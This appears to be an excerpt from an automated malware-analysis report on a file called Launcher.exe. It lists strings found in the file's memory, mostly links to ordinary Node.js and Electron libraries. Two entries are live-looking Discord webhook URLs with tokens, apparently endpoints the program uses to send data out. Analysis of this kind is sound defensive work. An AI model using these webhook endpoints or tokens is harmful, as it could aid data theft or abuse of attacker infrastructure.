          Source: Launcher.exe, 00000000.00000003.1255111010.000002C308E41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1158702898.00000174E0538000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://archiverjs.com/zip-stream/ZipStream.html
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10201
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
          Source: Launcher.exe, 00000000.00000003.1131941974.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1135628118.00000174E0460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://camo.githubusercontent.com/6bbd36f4cf5b35a0f11a96dcd2e97711ffc2fb37/68747470733a2f2f662e636c
          Source: Launcher.exe, 00000000.00000003.1131941974.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1135628118.00000174E0460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://camo.githubusercontent.com/f4810e00e1c5f5f8addbe3e9f49064fd5d102699/68747470733a2f2f662e636c
          Source: Launcher.exe, 00000000.00000003.1188055870.00000174E07C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1119343969.00000174E07C8000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1146130990.00000174E07C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://canary.discord.com/api/webhooks/1276788778043965460/Orf3jKknL6GAnLBbxaHKrGxT9G-fuDkG7Pp9Ks25
          Source: Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1135628118.00000174E045C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1139296292.00000174E045C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caolan.github.io/async/
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#clear
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count-map
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#countreset
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#table
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coolaj86.com/articles/building-sqlcipher-for-node-js-on-raspberry-pi-2/).
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://crbug.com/v8/7848
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
          Source: Launcher.exe, 00000000.00000003.1434526092.00000174E0420000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1424918981.0000015519841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7468#section-7
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/SpiderMonkey/Parser_API
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/PerformanceResourceTiming
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
          Source: Launcher.exe, 00000000.00000003.1144705420.00000174E0450000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1153958014.00000174E0458000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1144705420.00000174E0458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith
          Source: Launcher.exe, 00000000.00000003.1144705420.00000174E0450000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1153958014.00000174E0458000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1144705420.00000174E0458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/includes
          Source: Launcher.exe, 00000000.00000003.1144705420.00000174E0450000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1153958014.00000174E0458000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1144705420.00000174E0458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
          Source: Launcher.exe, 00000000.00000003.1131941974.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1136559709.00000174E0501000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/async_function
          Source: Launcher.exe, 00000000.00000003.1146130990.00000174E07C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1276677347420143668/aMHlm0o0ZhGtCul2q9gome8sh0haDj4SJnUPs-KPbbe-9TU
          Source: Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://electronjs.org/headers
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#fetch-timing-info
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ghost.org).
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
          Source: Launcher.exe, 00000000.00000003.1411921117.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1428225050.00000177B9F41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR
          Source: Launcher.exe, 00000000.00000003.1411921117.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1428225050.00000177B9F41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR/safer-buffer.git
          Source: Launcher.exe, 00000000.00000003.1411921117.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR/safer-buffer.gitA
          Source: Launcher.exe, 00000000.00000003.1411921117.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1428225050.00000177B9F41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChALkeR/safer-buffer/issues
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Mithgol)
          Source: Launcher.exe, 00000000.00000003.1138033598.00000174E04E3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Rob--W/proxy-from-env#readme
          Source: Launcher.exe, 00000000.00000003.1138033598.00000174E04E3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Rob--W/proxy-from-env.git
          Source: Launcher.exe, 00000000.00000003.1138033598.00000174E04E3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Rob--W/proxy-from-env/issues
          Source: Launcher.exe, 00000000.00000003.1459581379.00000174E09FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify#readme
          Source: Launcher.exe, 00000000.00000003.1459581379.00000174E09FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify.git
          Source: Launcher.exe, 00000000.00000003.1459581379.00000174E09FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify/issues
          Source: Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/SheetJS/js-crc32/issues
          Source: Launcher.exe, 00000000.00000003.1210752491.00000174E0880000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1220923642.00000174E0880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/file-uri-to-path
          Source: Launcher.exe, 00000000.00000003.1210752491.00000174E0880000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1220923642.00000174E0880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/file-uri-to-path/issues
          Source: Launcher.exe, 00000000.00000003.1229981135.00000174E0635000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E0635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/node-bindings
          Source: Launcher.exe, 00000000.00000003.1229981135.00000174E0635000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E0635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/node-bindings/issues
          Source: Launcher.exe, 00000000.00000003.1149072420.00000174E0639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/util-deprecate
          Source: Launcher.exe, 00000000.00000003.1149072420.00000174E0639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/util-deprecate/issues
          Source: Launcher.exe, 00000000.00000003.1229981135.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1302231555.00000174E0383000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1232344631.00000174E0380000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E05FD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1302709891.00000174E040D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3
          Source: Launcher.exe, 00000000.00000003.1229981135.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1302231555.00000174E0383000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1232344631.00000174E0380000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E05FD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1302709891.00000174E040D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3.git
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3/blob/b05f4594cf8b0de64743561fcd2cfe6f4571754d/CHANGELOG.md)
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3/releases)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3/wiki/API#databaseloadextensionpath-callback)
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3/wiki/API)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3/workflows/CI/badge.svg?branch=master)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/WICG/scheduling-apis
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
          Source: Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E05CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Yqnn/node-readdir-glob
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js#L23
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/issues/575
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/addaleax/eventemitter-asyncresource
          Source: Launcher.exe, 00000000.00000003.1124547608.00000174E0464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/alexindigo/asynckit#readme
          Source: Launcher.exe, 00000000.00000003.1124547608.00000174E0464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/alexindigo/asynckit.git
          Source: Launcher.exe, 00000000.00000003.1124547608.00000174E0464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/alexindigo/asynckit/issues
          Source: Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1131941974.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1165538286.00000174E0A52000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1147575346.00000174E068D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/archiver-utils#readme
          Source: Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1131941974.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1165538286.00000174E0A52000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1147575346.00000174E068D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/archiver-utils.git
          Source: Launcher.exe, 00000000.00000003.1271727944.000001F349E01000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1165538286.00000174E0A72000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1131941974.00000174E0691000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134121610.00000174E06EF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1165538286.00000174E0A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/archiver-utils/blob/master/LICENSE
          Source: Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1131941974.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1165538286.00000174E0A52000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1147575346.00000174E068D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/archiver-utils/issues
          Source: Launcher.exe, 00000000.00000003.1130016639.00000174E0575000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver
          Source: Launcher.exe, 00000000.00000003.1130016639.00000174E0575000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver.git
          Source: Launcher.exe, 00000000.00000003.1134655854.00000174E05BB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E0619000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1229981135.00000174E0619000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1202995845.00000174E0922000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E0621000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E0575000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E05BB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1255111010.000002C308E41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1158702898.00000174E0534000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1202995845.00000174E092E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134655854.00000174E05F5000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E058D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1191986739.00000174E0528000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1262056482.000003F1D1F01000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1158702898.00000174E0538000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver/blob/master/LICENSE
          Source: Launcher.exe, 00000000.00000003.1202995845.00000174E092A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1256739910.000002CA4EC01000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08D6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E0542000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08EE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver/blob/master/LICENSE-MIT
          Source: Launcher.exe, 00000000.00000003.1130016639.00000174E0575000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver/issues
          Source: Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1177023374.00000174E087C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-compress-commons
          Source: Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-compress-commons.git
          Source: Launcher.exe, 00000000.00000003.1191125437.00000174E0428000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1175489451.00000174E0428000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1191125437.00000174E0438000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1195308680.00000174E0967000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1175489451.00000174E0444000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269515805.0000036AF2301000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1177023374.00000174E08A4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1177023374.00000174E089C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1177023374.00000174E08AC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1191125437.00000174E0450000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1191125437.00000174E0454000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1185814574.00000174E095B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1175489451.00000174E0454000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1255111010.000002C308E41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1191125437.00000174E043C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1177023374.00000174E08A0000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1175489451.00000174E043C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1177023374.00000174E08B0000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1184973623.00000174E041C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-compress-commons/blob/master/LICENSE-MIT
          Source: Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-compress-commons/issues
          Source: Launcher.exe, 00000000.00000003.1195308680.00000174E097F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32-stream
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32-stream.git
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32-stream.gitA
          Source: Launcher.exe, 00000000.00000003.1165538286.00000174E0A6A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1185814574.00000174E097F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1255111010.000002C308E41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1165538286.00000174E0A6E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1185814574.00000174E096B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32-stream/blob/master/LICENSE-MIT
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32-stream/issues
          Source: Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream
          Source: Launcher.exe, 00000000.00000003.1177023374.00000174E0880000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream.git
          Source: Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream.gitf
          Source: Launcher.exe, 00000000.00000003.1177023374.00000174E087C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream/blob/master/LICENSE
          Source: Launcher.exe, 00000000.00000003.1177023374.00000174E0880000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream/issues
          Source: Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream/issues);
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/artiz)
